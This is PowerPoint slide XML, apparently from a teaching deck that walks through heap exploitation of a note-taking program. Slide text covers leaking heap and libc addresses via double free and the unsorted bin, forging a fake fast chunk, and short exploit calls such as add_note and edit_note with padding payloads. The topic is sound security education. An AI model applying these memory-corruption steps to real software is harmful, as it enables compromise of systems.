            <a:off x="5589200" y="2949100"/>
            <a:ext cx="434100" cy="1343100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -54855" name="adj1"/>
              <a:gd fmla="val 11529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 heap address using double free</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2722" name="Shape 2722"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584075" y="2670150"/>
            <a:ext cx="27306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list_note()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leaked chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x604970's fd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That is heap address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3" name="Shape 2723"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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4" name="Shape 2724"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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size=0x18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2725" name="Shape 2725"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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26" name="Shape 2726"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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727" name="Shape 2727"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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8" name="Shape 2728"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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729" name="Shape 2729"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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30" name="Shape 2730"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2731" name="Shape 2731"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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32" name="Shape 2732"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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733" name="Shape 2733"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2734" name="Shape 2734"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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735" name="Shape 2735"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2736" name="Shape 2736"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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737" name="Shape 2737"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2738" name="Shape 2738"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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739" name="Shape 2739"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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740" name="Shape 2740"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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741" name="Shape 2741"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2742" name="Shape 2742"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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743" name="Shape 2743"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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744" name="Shape 2744"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="404810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0x604850</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2745" name="Shape 2745"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2746" name="Shape 2746"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="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7" name="Shape 2747"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3723050"/>
            <a:ext cx="0" cy="33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8" name="Shape 2748"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075650"/>
            <a:ext cx="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9" name="Shape 2749"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5585725" y="3717800"/>
            <a:ext cx="72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0" name="Shape 2750"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2745" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4321550" y="3444250"/>
            <a:ext cx="1371600" cy="381300"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -13417" name="adj1"/>
              <a:gd fmla="val 162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1" name="Shape 2751"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2745" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5589200" y="2949100"/>
            <a:ext cx="434100" cy="1343100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -54855" name="adj1"/>
              <a:gd fmla="val 11529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r>
              <a:rPr lang="en"/>
              <a:t> &amp; Logic Instructions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add/sub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inc/dec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imul/idiv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and/or/xor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not/neg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shl/shr</a:t>
            </a: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Shape 27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 libc address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2757" name="Shape 2757"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196250" y="2653700"/>
            <a:ext cx="31482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edit_note(0, 'A' * (0x90 - 8))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8" name="Shape 2758"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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9" name="Shape 2759"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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760" name="Shape 2760"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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61" name="Shape 2761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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762" name="Shape 2762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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63" name="Shape 2763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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764" name="Shape 2764"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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65" name="Shape 2765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2766" name="Shape 2766"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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67" name="Shape 2767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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768" name="Shape 2768"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2769" name="Shape 2769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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770" name="Shape 2770"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2771" name="Shape 2771"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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772" name="Shape 2772"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2773" name="Shape 2773"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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774" name="Shape 2774"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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775" name="Shape 2775"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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776" name="Shape 2776"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2777" name="Shape 2777"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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778" name="Shape 2778"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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779" name="Shape 2779"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2780" name="Shape 2780"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="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1" name="Shape 2781"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075650"/>
            <a:ext cx="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2" name="Shape 2782"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2779" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4602500" y="3163300"/>
            <a:ext cx="802500" cy="374100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -92184" name="adj1"/>
              <a:gd fmla="val 163653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3" name="Shape 2783"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2779" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5575100" y="2949100"/>
            <a:ext cx="448200" cy="809400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -53129" name="adj1"/>
              <a:gd fmla="val 18966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Shape 27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 libc address</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2789" name="Shape 2789"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196250" y="2653700"/>
            <a:ext cx="31482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list_note()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leaked chunk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x604970's fd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That is unsorted bin's address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0" name="Shape 2790"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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1" name="Shape 2791"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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792" name="Shape 2792"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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93" name="Shape 2793"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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794" name="Shape 2794"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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95" name="Shape 2795"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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796" name="Shape 2796"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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97" name="Shape 2797"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2798" name="Shape 2798"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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99" name="Shape 2799"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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800" name="Shape 2800"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2801" name="Shape 2801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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802" name="Shape 2802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2803" name="Shape 2803"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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804" name="Shape 2804"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2805" name="Shape 2805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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06" name="Shape 2806"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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07" name="Shape 2807"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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08" name="Shape 2808"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2809" name="Shape 2809"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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10" name="Shape 2810"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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811" name="Shape 2811"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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unsorted bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2812" name="Shape 2812"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190925" y="3073600"/>
            <a:ext cx="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3" name="Shape 2813"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5589325" y="3075650"/>
            <a:ext cx="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4" name="Shape 2814"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="2811" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="5400000">
            <a:off x="4602500" y="3163300"/>
            <a:ext cx="802500" cy="374100"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -92184" name="adj1"/>
              <a:gd fmla="val 163653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5" name="Shape 2815"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2811" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5575100" y="2949100"/>
            <a:ext cx="448200" cy="809400"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd fmla="val -53129" name="adj1"/>
              <a:gd fmla="val 18966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9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Shape 28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fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2821" name="Shape 2821"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196250" y="2653700"/>
            <a:ext cx="31482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add_note('A' * (0x70 - 8))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add_note('A' * (0x80 - 8))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2" name="Shape 2822"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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23" name="Shape 2823"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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824" name="Shape 2824"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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25" name="Shape 2825"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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826" name="Shape 2826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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27" name="Shape 2827"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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828" name="Shape 2828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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29" name="Shape 2829"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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size=0x68</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2830" name="Shape 2830"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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31" name="Shape 2831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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832" name="Shape 2832"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2833" name="Shape 2833"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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834" name="Shape 2834"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2835" name="Shape 2835"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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836" name="Shape 2836"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2837" name="Shape 2837"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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38" name="Shape 2838"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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39" name="Shape 2839"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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40" name="Shape 2840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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41" name="Shape 2841"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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42" name="Shape 2842"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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843" name="Shape 2843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2844" name="Shape 2844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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0x604a90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2845" name="Shape 2845"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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9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Shape 28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fake fast chunk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2851" name="Shape 28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52" name="Shape 2852"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196250" y="2653700"/>
            <a:ext cx="31482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delete_note(3)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3" name="Shape 2853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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54" name="Shape 2854"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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855" name="Shape 2855"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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56" name="Shape 2856"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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857" name="Shape 2857"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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58" name="Shape 2858"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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859" name="Shape 2859"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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60" name="Shape 2860"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2861" name="Shape 2861"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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62" name="Shape 2862"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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863" name="Shape 2863"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15911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2864" name="Shape 2864"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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865" name="Shape 2865"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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2866" name="Shape 2866"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="48563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867" name="Shape 2867"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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2868" name="Shape 2868"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591175" y="17806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69" name="Shape 2869"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="26795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70" name="Shape 2870"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="37679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71" name="Shape 2871"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4856375" y="17806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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2872" name="Shape 2872"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="59447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73" name="Shape 2873"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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874" name="Shape 2874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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size=0x78</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2875" name="Shape 2875"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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0x604a90</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2876" name="Shape 2876"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="70331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877" name="Shape 2877"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="282460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bin</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2878" name="Shape 2878"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4816700" y="347405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0x604970s</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
